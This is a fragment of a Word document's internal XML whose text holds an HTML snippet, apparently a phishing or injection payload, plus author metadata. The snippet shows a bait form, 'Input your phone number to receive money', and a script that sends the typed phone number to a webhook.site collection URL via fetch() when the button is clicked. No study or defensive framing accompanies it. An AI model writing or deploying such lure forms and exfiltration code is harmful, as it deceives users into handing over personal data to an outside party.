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037F" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t>&lt;label&gt;Input your phone number to receive money:&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C0737" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                    &lt;input type="text" id="phone" class="text-input"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D87EC" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                    &lt;button type="submit" id="btn" name="comment" class="btn"&gt;Click here to receive money&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D343263" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DEF03" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                        const submit = document.getElementById("btn");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847010F" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700746A" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                        submit.addEventListener("click", function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EE9C9" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                            var phone = document.getElementById("phone").value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADBB7B5" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                            fetch("https://webhook.site/9f0b5d43-908b-4aea-be4b-2d37a07af846/?p="+encodeURIComponent(phone));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2385FA" w14:textId="77777777" w:rsidR="001F1461" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC8CDF" w14:textId="7FD79EE2" w:rsidR="00967DA0" w:rsidRDefault="001F1461" w:rsidP="001F1461">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0096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61"/>
    <w:rsid w:val="001F1461"/>
    <w:rsid w:val="009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CD08"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{339FAD19-FEB4-479F-AFF8-9ABCC3A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Danh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lê Công Danh</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-11T17:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T17:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>